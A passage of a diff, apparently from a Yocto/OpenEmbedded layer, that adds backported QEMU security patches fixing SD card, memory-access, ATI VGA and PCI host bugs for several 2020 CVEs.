+CVE: CVE-2020-13253
+
+Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
+---
+ hw/sd/sd.c | 25 +++++++++++++++++++++++++
+ 1 file changed, 25 insertions(+)
+
+diff --git a/hw/sd/sd.c b/hw/sd/sd.c
+index edd60a09c0..76d68359a4 100644
+--- a/hw/sd/sd.c
++++ b/hw/sd/sd.c
+@@ -32,6 +32,7 @@
+
+ #include "qemu/osdep.h"
+ #include "qemu/units.h"
++#include "qemu/cutils.h"
+ #include "hw/irq.h"
+ #include "hw/registerfields.h"
+ #include "sysemu/block-backend.h"
+@@ -2106,11 +2107,35 @@ static void sd_realize(DeviceState *dev, Error **errp)
+ }
+
+ if (sd->blk) {
++ int64_t blk_size;
++
+ if (blk_is_read_only(sd->blk)) {
+ error_setg(errp, "Cannot use read-only drive as SD card");
+ return;
+ }
+
++ blk_size = blk_getlength(sd->blk);
++ if (blk_size > 0 && !is_power_of_2(blk_size)) {
++ int64_t blk_size_aligned = pow2ceil(blk_size);
++ char *blk_size_str;
++
++ blk_size_str = size_to_str(blk_size);
++ error_setg(errp, "Invalid SD card size: %s", blk_size_str);
++ g_free(blk_size_str);
++
++ blk_size_str = size_to_str(blk_size_aligned);
++ error_append_hint(errp,
++ "SD card size has to be a power of 2, e.g. %s.\n"
++ "You can resize disk images with"
++ " 'qemu-img resize <imagefile> <new-size>'\n"
++ "(note that this will lose data if you make the"
++ " image smaller than it currently is).\n",
++ blk_size_str);
++ g_free(blk_size_str);
++
++ return;
++ }
++
+ ret = blk_set_perm(sd->blk, BLK_PERM_CONSISTENT_READ | BLK_PERM_WRITE,
+ BLK_PERM_ALL, errp);
+ if (ret < 0) {
+--
+2.32.0
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-13253_3.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-13253_3.patch
new file mode 100644
index 0000000000..b512b2bd7f
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-13253_3.patch
@@ -0,0 +1,86 @@
+From 794d68de2f021a6d3874df41d6bbe8590ec05207 Mon Sep 17 00:00:00 2001
+From: =?utf8?q?Philippe=20Mathieu-Daud=C3=A9?= <f4bug@amsat.org>
+Date: Mon, 13 Jul 2020 09:27:35 +0200
+Subject: [PATCH] hw/sd/sdcard: Update coding style to make checkpatch.pl happy
+MIME-Version: 1.0
+Content-Type: text/plain; charset=utf8
+Content-Transfer-Encoding: 8bit
+
+To make the next commit easier to review, clean this code first.
+
+Reviewed-by: Peter Maydell <peter.maydell@linaro.org>
+Signed-off-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
+Reviewed-by: Alistair Francis <alistair.francis@wdc.com>
+Reviewed-by: Alexander Bulekov <alxndr@bu.edu>
+Message-Id: <20200630133912.9428-3-f4bug@amsat.org>
+
+Upstram-Status: Backport:
+https://git.qemu.org/?p=qemu.git;a=commit;f=hw/sd/sd.c;h=794d68de2f021a6d3874df41d6bbe8590ec05207
+
+CVE: CVE-2020-13253
+
+Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
+---
+diff --git a/hw/sd/sd.c b/hw/sd/sd.c
+--- a/hw/sd/sd.c (revision b0ca999a43a22b38158a222233d3f5881648bb4f)
++++ b/hw/sd/sd.c (date 1647514442924)
+@@ -1154,8 +1154,9 @@
+ sd->data_start = addr;
+ sd->data_offset = 0;
+
+- if (sd->data_start + sd->blk_len > sd->size)
++ if (sd->data_start + sd->blk_len > sd->size) {
+ sd->card_status |= ADDRESS_ERROR;
++ }
+ return sd_r1;
+
+ default:
+@@ -1170,8 +1171,9 @@
+ sd->data_start = addr;
+ sd->data_offset = 0;
+
+- if (sd->data_start + sd->blk_len > sd->size)
++ if (sd->data_start + sd->blk_len > sd->size) {
+ sd->card_status |= ADDRESS_ERROR;
++ }
+ return sd_r1;
+
+ default:
+@@ -1216,12 +1218,15 @@
+ sd->data_offset = 0;
+ sd->blk_written = 0;
+
+- if (sd->data_start + sd->blk_len > sd->size)
++ if (sd->data_start + sd->blk_len > sd->size) {
+ sd->card_status |= ADDRESS_ERROR;
+- if (sd_wp_addr(sd, sd->data_start))
++ }
++ if (sd_wp_addr(sd, sd->data_start)) {
+ sd->card_status |= WP_VIOLATION;
+- if (sd->csd[14] & 0x30)
++ }
++ if (sd->csd[14] & 0x30) {
+ sd->card_status |= WP_VIOLATION;
++ }
+ return sd_r1;
+
+ default:
+@@ -1240,12 +1245,15 @@
+ sd->data_offset = 0;
+ sd->blk_written = 0;
+
+- if (sd->data_start + sd->blk_len > sd->size)
++ if (sd->data_start + sd->blk_len > sd->size) {
+ sd->card_status |= ADDRESS_ERROR;
+- if (sd_wp_addr(sd, sd->data_start))
++ }
++ if (sd_wp_addr(sd, sd->data_start)) {
+ sd->card_status |= WP_VIOLATION;
+- if (sd->csd[14] & 0x30)
++ }
++ if (sd->csd[14] & 0x30) {
+ sd->card_status |= WP_VIOLATION;
++ }
+ return sd_r1;
+
+ default:
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-13253_4.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-13253_4.patch
new file mode 100644
index 0000000000..6b4c1ec050
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-13253_4.patch
@@ -0,0 +1,139 @@
+From 790762e5487114341cccc5bffcec4cb3c022c3cd Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Philippe=20Mathieu-Daud=C3=A9?= <f4bug@amsat.org>
+Date: Thu, 4 Jun 2020 19:22:29 +0200
+Subject: [PATCH] hw/sd/sdcard: Do not switch to ReceivingData if address is
+ invalid
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Only move the state machine to ReceivingData if there is no
+pending error. This avoids later OOB access while processing
+commands queued.
+
+ "SD Specifications Part 1 Physical Layer Simplified Spec. v3.01"
+
+ 4.3.3 Data Read
+
+ Read command is rejected if BLOCK_LEN_ERROR or ADDRESS_ERROR
+ occurred and no data transfer is performed.
+
+ 4.3.4 Data Write
+
+ Write command is rejected if BLOCK_LEN_ERROR or ADDRESS_ERROR
+ occurred and no data transfer is performed.
+
+WP_VIOLATION errors are not modified: the error bit is set, we
+stay in receive-data state, wait for a stop command. All further
+data transfer is ignored. See the check on sd->card_status at the
+beginning of sd_read_data() and sd_write_data().
+
+Fixes: CVE-2020-13253
+
+Cc: qemu-stable@nongnu.org
+Reported-by: Alexander Bulekov <alxndr@bu.edu>
+Buglink: https://bugs.launchpad.net/qemu/+bug/1880822
+Reviewed-by: Peter Maydell <peter.maydell@linaro.org>
+Signed-off-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
+Reviewed-by: Alistair Francis <alistair.francis@wdc.com>
+Message-Id: <20200630133912.9428-6-f4bug@amsat.org>
+
+Upstram-Status: Backport:
+https://git.qemu.org/?p=qemu.git;a=commit;h=790762e5487114341cccc5bffcec4cb3c022c3cd
+
+CVE: CVE-2020-13253
+
+Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
+---
+ hw/sd/sd.c | 38 ++++++++++++++++++++++++--------------
+ 1 file changed, 24 insertions(+), 14 deletions(-)
+
+diff --git a/hw/sd/sd.c b/hw/sd/sd.c
+index f4f76f8fd2..fad9cf1ee7 100644
+--- a/hw/sd/sd.c
++++ b/hw/sd/sd.c
+@@ -1171,13 +1171,15 @@ static sd_rsp_type_t sd_normal_command(SDState *sd, SDRequest req)
+ case 17: /* CMD17: READ_SINGLE_BLOCK */
+ switch (sd->state) {
+ case sd_transfer_state:
+- sd->state = sd_sendingdata_state;
+- sd->data_start = addr;
+- sd->data_offset = 0;
+
+- if (sd->data_start + sd->blk_len > sd->size) {
++ if (addr + sd->blk_len > sd->size) {
+ sd->card_status |= ADDRESS_ERROR;
++ return sd_r1;
+ }
++
++ sd->state = sd_sendingdata_state;
++ sd->data_start = addr;
++ sd->data_offset = 0;
+ return sd_r1;
+
+ default:
+@@ -1188,13 +1190,15 @@ static sd_rsp_type_t sd_normal_command(SDState *sd, SDRequest req)
+ case 18: /* CMD18: READ_MULTIPLE_BLOCK */
+ switch (sd->state) {
+ case sd_transfer_state:
+- sd->state = sd_sendingdata_state;
+- sd->data_start = addr;
+- sd->data_offset = 0;
+
+- if (sd->data_start + sd->blk_len > sd->size) {
++ if (addr + sd->blk_len > sd->size) {
+ sd->card_status |= ADDRESS_ERROR;
++ return sd_r1;
+ }
++
++ sd->state = sd_sendingdata_state;
++ sd->data_start = addr;
++ sd->data_offset = 0;
+ return sd_r1;
+
+ default:
+@@ -1234,14 +1238,17 @@ static sd_rsp_type_t sd_normal_command(SDState *sd, SDRequest req)
+ /* Writing in SPI mode not implemented. */
+ if (sd->spi)
+ break;
++
++ if (addr + sd->blk_len > sd->size) {
++ sd->card_status |= ADDRESS_ERROR;
++ return sd_r1;
++ }
++
+ sd->state = sd_receivingdata_state;
+ sd->data_start = addr;
+ sd->data_offset = 0;
+ sd->blk_written = 0;
+
+- if (sd->data_start + sd->blk_len > sd->size) {
+- sd->card_status |= ADDRESS_ERROR;
+- }
+ if (sd_wp_addr(sd, sd->data_start)) {
+ sd->card_status |= WP_VIOLATION;
+ }
+@@ -1261,14 +1268,17 @@ static sd_rsp_type_t sd_normal_command(SDState *sd, SDRequest req)
+ /* Writing in SPI mode not implemented. */
+ if (sd->spi)
+ break;
++
++ if (addr + sd->blk_len > sd->size) {
++ sd->card_status |= ADDRESS_ERROR;
++ return sd_r1;
++ }
++
+ sd->state = sd_receivingdata_state;
+ sd->data_start = addr;
+ sd->data_offset = 0;
+ sd->blk_written = 0;
+
+- if (sd->data_start + sd->blk_len > sd->size) {
+- sd->card_status |= ADDRESS_ERROR;
+- }
+ if (sd_wp_addr(sd, sd->data_start)) {
+ sd->card_status |= WP_VIOLATION;
+ }
+--
+2.32.0
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-13253_5.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-13253_5.patch
new file mode 100644
index 0000000000..ffce610f79
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-13253_5.patch
@@ -0,0 +1,54 @@
+From 9157dd597d293ab7f599f4d96c3fe8a6e07c633d Mon Sep 17 00:00:00 2001
+From: =?utf8?q?Philippe=20Mathieu-Daud=C3=A9?= <f4bug@amsat.org>
+Date: Wed, 3 Jun 2020 19:59:16 +0200
+Subject: [PATCH] hw/sd/sdcard: Restrict Class 6 commands to SCSD cards
+MIME-Version: 1.0
+Content-Type: text/plain; charset=utf8
+Content-Transfer-Encoding: 8bit
+
+Only SCSD cards support Class 6 (Block Oriented Write Protection)
+commands.
+
+ "SD Specifications Part 1 Physical Layer Simplified Spec. v3.01"
+
+ 4.3.14 Command Functional Difference in Card Capacity Types
+
+ * Write Protected Group
+
+ SDHC and SDXC do not support write-protected groups. Issuing
+ CMD28, CMD29 and CMD30 generates the ILLEGAL_COMMAND error.
+
+Cc: qemu-stable@nongnu.org
+Reviewed-by: Peter Maydell <peter.maydell@linaro.org>
+Signed-off-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
+Reviewed-by: Alistair Francis <alistair.francis@wdc.com>
+Message-Id: <20200630133912.9428-7-f4bug@amsat.org>
+
+Upstram-Status: Backport:
+https://git.qemu.org/?p=qemu.git;a=commit;h=9157dd597d293ab7f599f4d96c3fe8a6e07c633d
+
+CVE: CVE-2020-13253
+
+Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
+---
+ hw/sd/sd.c | 5 +++++
+ 1 file changed, 5 insertions(+)
+
+diff --git a/hw/sd/sd.c b/hw/sd/sd.c
+index 5137168..1cc16bf 100644
+--- a/hw/sd/sd.c
++++ b/hw/sd/sd.c
+@@ -920,6 +920,11 @@ static sd_rsp_type_t sd_normal_command(SDState *sd, SDRequest req)
+ sd->multi_blk_cnt = 0;
+ }
+
++ if (sd_cmd_class[req.cmd] == 6 && FIELD_EX32(sd->ocr, OCR, CARD_CAPACITY)) {
++ /* Only Standard Capacity cards support class 6 commands */
++ return sd_illegal;
++ }
++
+ switch (req.cmd) {
+ /* Basic commands (Class 0 and Class 1) */
+ case 0: /* CMD0: GO_IDLE_STATE */
+--
+1.8.3.1
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-13754-1.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-13754-1.patch
new file mode 100644
index 0000000000..fdfff9d81d
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-13754-1.patch
@@ -0,0 +1,91 @@
+From 5d971f9e672507210e77d020d89e0e89165c8fc9 Mon Sep 17 00:00:00 2001
+From: "Michael S. Tsirkin" <mst@redhat.com>
+Date: Wed, 10 Jun 2020 09:47:49 -0400
+Subject: [PATCH] memory: Revert "memory: accept mismatching sizes in
+ memory_region_access_valid"
+
+Memory API documentation documents valid .min_access_size and .max_access_size
+fields and explains that any access outside these boundaries is blocked.
+
+This is what devices seem to assume.
+
+However this is not what the implementation does: it simply
+ignores the boundaries unless there's an "accepts" callback.
+
+Naturally, this breaks a bunch of devices.
+
+Revert to the documented behaviour.
+
+Devices that want to allow any access can just drop the valid field,
+or add the impl field to have accesses converted to appropriate
+length.
+
+Cc: qemu-stable@nongnu.org
+Reviewed-by: Richard Henderson <rth@twiddle.net>
+Fixes: CVE-2020-13754
+Fixes: https://bugzilla.redhat.com/show_bug.cgi?id=1842363
+Fixes: a014ed07bd5a ("memory: accept mismatching sizes in memory_region_access_valid")
+Signed-off-by: Michael S. Tsirkin <mst@redhat.com>
+Message-Id: <20200610134731.1514409-1-mst@redhat.com>
+Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
+
+https://git.qemu.org/?p=qemu.git;a=patch;h=5d971f9e672507210e77d020d89e0e89165c8fc9
+CVE: CVE-2020-13754
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ memory.c | 29 +++++++++--------------------
+ 1 file changed, 9 insertions(+), 20 deletions(-)
+
+diff --git a/memory.c b/memory.c
+index 2f15a4b..9200b20 100644
+--- a/memory.c
++++ b/memory.c
+@@ -1352,35 +1352,24 @@ bool memory_region_access_valid(MemoryRegion *mr,
+ bool is_write,
+ MemTxAttrs attrs)
+ {
+- int access_size_min, access_size_max;
+- int access_size, i;
+-
+- if (!mr->ops->valid.unaligned && (addr & (size - 1))) {
++ if (mr->ops->valid.accepts
++ && !mr->ops->valid.accepts(mr->opaque, addr, size, is_write, attrs)) {
+ return false;
+ }
+
+- if (!mr->ops->valid.accepts) {
+- return true;
+- }
+-
+- access_size_min = mr->ops->valid.min_access_size;
+- if (!mr->ops->valid.min_access_size) {
+- access_size_min = 1;
++ if (!mr->ops->valid.unaligned && (addr & (size - 1))) {
++ return false;
+ }
+
+- access_size_max = mr->ops->valid.max_access_size;
++ /* Treat zero as compatibility all valid */
+ if (!mr->ops->valid.max_access_size) {
+- access_size_max = 4;
++ return true;
+ }
+
+- access_size = MAX(MIN(size, access_size_max), access_size_min);
+- for (i = 0; i < size; i += access_size) {
+- if (!mr->ops->valid.accepts(mr->opaque, addr + i, access_size,
+- is_write, attrs)) {
+- return false;
+- }
++ if (size > mr->ops->valid.max_access_size
++ || size < mr->ops->valid.min_access_size) {
++ return false;
+ }
+-
+ return true;
+ }
+
+--
+1.8.3.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-13754-2.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-13754-2.patch
new file mode 100644
index 0000000000..7354edc54d
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-13754-2.patch
@@ -0,0 +1,69 @@
+From dba04c3488c4699f5afe96f66e448b1d447cf3fb Mon Sep 17 00:00:00 2001
+From: Michael Tokarev <mjt@tls.msk.ru>
+Date: Mon, 20 Jul 2020 19:06:27 +0300
+Subject: [PATCH] acpi: accept byte and word access to core ACPI registers
+
+All ISA registers should be accessible as bytes, words or dwords
+(if wide enough). Fix the access constraints for acpi-pm-evt,
+acpi-pm-tmr & acpi-cnt registers.
+
+Fixes: 5d971f9e67 (memory: Revert "memory: accept mismatching sizes in memory_region_access_valid")
+Fixes: afafe4bbe0 (apci: switch cnt to memory api)
+Fixes: 77d58b1e47 (apci: switch timer to memory api)
+Fixes: b5a7c024d2 (apci: switch evt to memory api)
+Buglink: https://lore.kernel.org/xen-devel/20200630170913.123646-1-anthony.perard@citrix.com/T/
+Buglink: https://bugs.debian.org/964793
+BugLink: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=964247
+BugLink: https://bugs.launchpad.net/bugs/1886318
+Reported-By: Simon John <git@the-jedi.co.uk>
+Signed-off-by: Michael Tokarev <mjt@tls.msk.ru>
+Message-Id: <20200720160627.15491-1-mjt@msgid.tls.msk.ru>
+Cc: qemu-stable@nongnu.org
+Reviewed-by: Michael S. Tsirkin <mst@redhat.com>
+Signed-off-by: Michael S. Tsirkin <mst@redhat.com>
+
+https://git.qemu.org/?p=qemu.git;a=patch;h=dba04c3488c4699f5afe96f66e448b1d447cf3fb
+CVE: CVE-2020-13754
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/acpi/core.c | 9 ++++++---
+ 1 file changed, 6 insertions(+), 3 deletions(-)
+
+diff --git a/hw/acpi/core.c b/hw/acpi/core.c
+index f6d9ec4..ac06db3 100644
+--- a/hw/acpi/core.c
++++ b/hw/acpi/core.c
+@@ -458,7 +458,8 @@ static void acpi_pm_evt_write(void *opaque, hwaddr addr, uint64_t val,
+ static const MemoryRegionOps acpi_pm_evt_ops = {
+ .read = acpi_pm_evt_read,
+ .write = acpi_pm_evt_write,
+- .valid.min_access_size = 2,
++ .impl.min_access_size = 2,
++ .valid.min_access_size = 1,
+ .valid.max_access_size = 2,
+ .endianness = DEVICE_LITTLE_ENDIAN,
+ };
+@@ -527,7 +528,8 @@ static void acpi_pm_tmr_write(void *opaque, hwaddr addr, uint64_t val,
+ static const MemoryRegionOps acpi_pm_tmr_ops = {
+ .read = acpi_pm_tmr_read,
+ .write = acpi_pm_tmr_write,
+- .valid.min_access_size = 4,
++ .impl.min_access_size = 4,
++ .valid.min_access_size = 1,
+ .valid.max_access_size = 4,
+ .endianness = DEVICE_LITTLE_ENDIAN,
+ };
+@@ -599,7 +601,8 @@ static void acpi_pm_cnt_write(void *opaque, hwaddr addr, uint64_t val,
+ static const MemoryRegionOps acpi_pm_cnt_ops = {
+ .read = acpi_pm_cnt_read,
+ .write = acpi_pm_cnt_write,
+- .valid.min_access_size = 2,
++ .impl.min_access_size = 2,
++ .valid.min_access_size = 1,
+ .valid.max_access_size = 2,
+ .endianness = DEVICE_LITTLE_ENDIAN,
+ };
+--
+1.8.3.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-13754-3.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-13754-3.patch
new file mode 100644
index 0000000000..2a8781050f
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-13754-3.patch
@@ -0,0 +1,65 @@
+From 8e67fda2dd6202ccec093fda561107ba14830a17 Mon Sep 17 00:00:00 2001
+From: Laurent Vivier <lvivier@redhat.com>
+Date: Tue, 21 Jul 2020 10:33:22 +0200
+Subject: [PATCH] xhci: fix valid.max_access_size to access address registers
+MIME-Version: 1.0
+Content-Type: text/plain; charset=utf8
+Content-Transfer-Encoding: 8bit
+
+QEMU XHCI advertises AC64 (64-bit addressing) but doesn't allow
+64-bit mode access in "runtime" and "operational" MemoryRegionOps.
+
+Set the max_access_size based on sizeof(dma_addr_t) as AC64 is set.
+
+XHCI specs:
+"If the xHC supports 64-bit addressing (AC64 = â1â), then software
+should write 64-bit registers using only Qword accesses. If a
+system is incapable of issuing Qword accesses, then writes to the
+64-bit address fields shall be performed using 2 Dword accesses;
+low Dword-first, high-Dword second. If the xHC supports 32-bit
+addressing (AC64 = â0â), then the high Dword of registers containing
+64-bit address fields are unused and software should write addresses
+using only Dword accesses"
+
+The problem has been detected with SLOF, as linux kernel always accesses
+registers using 32-bit access even if AC64 is set and revealed by
+5d971f9e6725 ("memory: Revert "memory: accept mismatching sizes in memory_region_access_valid"")
+
+Suggested-by: Alexey Kardashevskiy <aik@au1.ibm.com>
+Signed-off-by: Laurent Vivier <lvivier@redhat.com>
+Message-id: 20200721083322.90651-1-lvivier@redhat.com
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+
+https://git.qemu.org/?p=qemu.git;a=patch;h=8e67fda2dd6202ccec093fda561107ba14830a17
+CVE: CVE-2020-13754
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/usb/hcd-xhci.c | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/hw/usb/hcd-xhci.c b/hw/usb/hcd-xhci.c
+index b330e36..67a18fe 100644
+--- a/hw/usb/hcd-xhci.c
++++ b/hw/usb/hcd-xhci.c
+@@ -3184,7 +3184,7 @@ static const MemoryRegionOps xhci_oper_ops = {
+ .read = xhci_oper_read,
+ .write = xhci_oper_write,
+ .valid.min_access_size = 4,
+- .valid.max_access_size = 4,
++ .valid.max_access_size = sizeof(dma_addr_t),
+ .endianness = DEVICE_LITTLE_ENDIAN,
+ };
+
+@@ -3200,7 +3200,7 @@ static const MemoryRegionOps xhci_runtime_ops = {
+ .read = xhci_runtime_read,
+ .write = xhci_runtime_write,
+ .valid.min_access_size = 4,
+- .valid.max_access_size = 4,
++ .valid.max_access_size = sizeof(dma_addr_t),
+ .endianness = DEVICE_LITTLE_ENDIAN,
+ };
+
+--
+1.8.3.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-13754-4.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-13754-4.patch
new file mode 100644
index 0000000000..6bad07d03f
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-13754-4.patch
@@ -0,0 +1,39 @@
+From 70b78d4e71494c90d2ccb40381336bc9b9a22f79 Mon Sep 17 00:00:00 2001
+From: Alistair Francis <alistair.francis@wdc.com>
+Date: Tue, 30 Jun 2020 13:12:11 -0700
+Subject: [PATCH] hw/riscv: Allow 64 bit access to SiFive CLINT
+
+Commit 5d971f9e672507210e77d020d89e0e89165c8fc9
+"memory: Revert "memory: accept mismatching sizes in
+memory_region_access_valid"" broke most RISC-V boards as they do 64 bit
+accesses to the CLINT and QEMU would trigger a fault. Fix this failure
+by allowing 8 byte accesses.
+
+Signed-off-by: Alistair Francis <alistair.francis@wdc.com>
+Reviewed-by: LIU Zhiwei<zhiwei_liu@c-sky.com>
+Message-Id: <122b78825b077e4dfd39b444d3a46fe894a7804c.1593547870.git.alistair.francis@wdc.com>
+
+https://git.qemu.org/?p=qemu.git;a=patch;h=70b78d4e71494c90d2ccb40381336bc9b9a22f79
+CVE: CVE-2020-13754
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/riscv/sifive_clint.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/hw/riscv/sifive_clint.c b/hw/riscv/sifive_clint.c
+index b11ffa0..669c21a 100644
+--- a/hw/riscv/sifive_clint.c
++++ b/hw/riscv/sifive_clint.c
+@@ -181,7 +181,7 @@ static const MemoryRegionOps sifive_clint_ops = {
+ .endianness = DEVICE_LITTLE_ENDIAN,
+ .valid = {
+ .min_access_size = 4,
+- .max_access_size = 4
++ .max_access_size = 8
+ }
+ };
+
+--
+1.8.3.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-13791.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-13791.patch
new file mode 100644
index 0000000000..1e8278f7b7
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-13791.patch
@@ -0,0 +1,44 @@
+Date: Thu, 4 Jun 2020 16:25:24 +0530
+From: Prasad J Pandit <pjp@fedoraproject.org>
+Subject: [PATCH v3] ati-vga: check address before reading configuration bytes (CVE-2020-13791)
+
+While reading PCI configuration bytes, a guest may send an
+address towards the end of the configuration space. It may lead
+to an OOB access issue. Add check to ensure 'address + size' is
+within PCI configuration space.
+
+CVE: CVE-2020-13791
+
+Upstream-Status: Submitted
+https://lists.gnu.org/archive/html/qemu-devel/2020-06/msg00979.html
+
+Reported-by: Ren Ding <rding@gatech.edu>
+Reported-by: Hanqing Zhao <hanqing@gatech.edu>
+Reported-by: Yi Ren <c4tren@gmail.com>
+Suggested-by: BALATON Zoltan <balaton@eik.bme.hu>
+Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
+Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
+---
+ hw/display/ati.c | 4 +++-
+ 1 file changed, 3 insertions(+), 1 deletion(-)
+
+Update v3: avoid modifying 'addr' variable
+ -> https://lists.gnu.org/archive/html/qemu-devel/2020-06/msg00834.html
+
+diff --git a/hw/display/ati.c b/hw/display/ati.c
+index 67604e68de..b4d0fd88b7 100644
+--- a/hw/display/ati.c
++++ b/hw/display/ati.c
+@@ -387,7 +387,9 @@ static uint64_t ati_mm_read(void *opaque, hwaddr addr, unsigned int size)
+ val = s->regs.crtc_pitch;
+ break;
+ case 0xf00 ... 0xfff:
+- val = pci_default_read_config(&s->dev, addr - 0xf00, size);
++ if ((addr - 0xf00) + size <= pci_config_size(&s->dev)) {
++ val = pci_default_read_config(&s->dev, addr - 0xf00, size);
++ }
+ break;
+ case CUR_OFFSET:
+ val = s->regs.cur_offset;
+--
+2.26.2
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-1.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-1.patch
new file mode 100644
index 0000000000..20f39f0a26
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-1.patch
@@ -0,0 +1,50 @@
+From 520f26fc6d17b71a43eaf620e834b3bdf316f3d3 Mon Sep 17 00:00:00 2001
+From: Prasad J Pandit <pjp@fedoraproject.org>
+Date: Tue, 11 Aug 2020 17:11:25 +0530
+Subject: [PATCH] hw/pci-host: add pci-intack write method
+
+Add pci-intack mmio write method to avoid NULL pointer dereference
+issue.
+
+Reported-by: Lei Sun <slei.casper@gmail.com>
+Reviewed-by: Li Qiang <liq3ea@gmail.com>
+Reviewed-by: Peter Maydell <peter.maydell@linaro.org>
+Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
+Message-Id: <20200811114133.672647-2-ppandit@redhat.com>
+Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
+
+CVE: CVE-2020-15469
+Upstream-Status: Backport [import from ubuntu
+https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2020-15469-1.patch?h=ubuntu/focal-security
+Upstream commit https://github.com/qemu/qemu/commit/520f26fc6d17b71a43eaf620e834b3bdf316f3d3 ]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/pci-host/prep.c | 8 ++++++++
+ 1 file changed, 8 insertions(+)
+
+--- a/hw/pci-host/prep.c
++++ b/hw/pci-host/prep.c
+@@ -26,6 +26,7 @@
+ #include "qemu/osdep.h"
+ #include "qemu-common.h"
+ #include "qemu/units.h"
++#include "qemu/log.h"
+ #include "qapi/error.h"
+ #include "hw/pci/pci.h"
+ #include "hw/pci/pci_bus.h"
+@@ -119,8 +120,15 @@ static uint64_t raven_intack_read(void *
+ return pic_read_irq(isa_pic);
+ }
+
++static void raven_intack_write(void *opaque, hwaddr addr,
++ uint64_t data, unsigned size)
++{
++ qemu_log_mask(LOG_UNIMP, "%s not implemented\n", __func__);
++}
++
+ static const MemoryRegionOps raven_intack_ops = {
+ .read = raven_intack_read,
++ .write = raven_intack_write,
+ .valid = {
+ .max_access_size = 1,
+ },
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-2.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-2.patch
new file mode 100644
index 0000000000..d6715d337c
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-2.patch
@@ -0,0 +1,69 @@
+From 4f2a5202a05fc1612954804a2482f07bff105ea2 Mon Sep 17 00:00:00 2001
+From: Prasad J Pandit <pjp@fedoraproject.org>
+Date: Tue, 11 Aug 2020 17:11:26 +0530
+Subject: [PATCH] pci-host: designware: add pcie-msi read method
+
+Add pcie-msi mmio read method to avoid NULL pointer dereference
+issue.
+
+Reported-by: Lei Sun <slei.casper@gmail.com>
+Reviewed-by: Li Qiang <liq3ea@gmail.com>
+Reviewed-by: Peter Maydell <peter.maydell@linaro.org>
+Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
+Message-Id: <20200811114133.672647-3-ppandit@redhat.com>
+Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
+
+CVE: CVE-2020-15469
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2020-15469-2.patch?h=ubuntu/focal-security Upstream Commit https://github.com/qemu/qemu/commit/4f2a5202a05fc1612954804a2482f07bff105ea2]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/pci-host/designware.c | 19 +++++++++++++++++++
+ 1 file changed, 19 insertions(+)
+
+diff --git a/hw/pci-host/designware.c b/hw/pci-host/designware.c
+index f9fb97a..bde3a34 100644
+--- a/hw/pci-host/designware.c
++++ b/hw/pci-host/designware.c
+@@ -21,6 +21,7 @@
+ #include "qemu/osdep.h"
+ #include "qapi/error.h"
+ #include "qemu/module.h"
++#include "qemu/log.h"
+ #include "hw/pci/msi.h"
